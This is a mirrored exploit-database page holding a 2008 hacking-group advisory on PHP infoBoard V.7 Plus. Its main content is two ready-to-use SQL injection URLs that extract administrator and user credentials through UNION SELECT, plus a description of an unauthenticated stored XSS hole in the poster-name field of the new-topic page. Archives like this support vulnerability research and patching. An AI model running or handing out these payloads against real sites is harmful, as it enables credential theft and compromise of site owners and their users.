bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6566.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

57 lines
No EOL
2.3 KiB
Text
Raw Blame History

==========================================================
PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities
==========================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 25 September 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : PHP infoBoard V.7 Plus
VERSION : v.7
VENDOR : http://cannot.info/phpinfoboard
DOWNLOAD : http://cannot.info/lib/dw/plus7.zip
#####################################################
-- Remote SQL Injection ---
[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_admin--&showpage=10
[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_user--&showpage=10
Note: [prefix] is a prefix of table names that an administrator assigns it when he sets up PHP infoBoard.
-- Strore XSS --
At page http://[Target]/[path]/?action=newtopic&idcat=[number]
This page is used to add new topics and there is a feild "ª×èÍ" which is prepared for inserting poster's name.
We can inject javascript into this feild as result in "Stored XSS".
Example code of vulnerable input feild:
ª×èÍ</td><td width='125' height='25' align='left'><input name='isname' type='text' size='25' value='' />
Note:
- [number] is a idcat that an administrator assigns it (default is 1).
- We can inject javascript into the feild when we do not log in to be a user of a PHP infoBoard.
#####################################################################
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################
# milw0rm.com [2008-09-25]
Reference in a new issue View git blame Copy permalink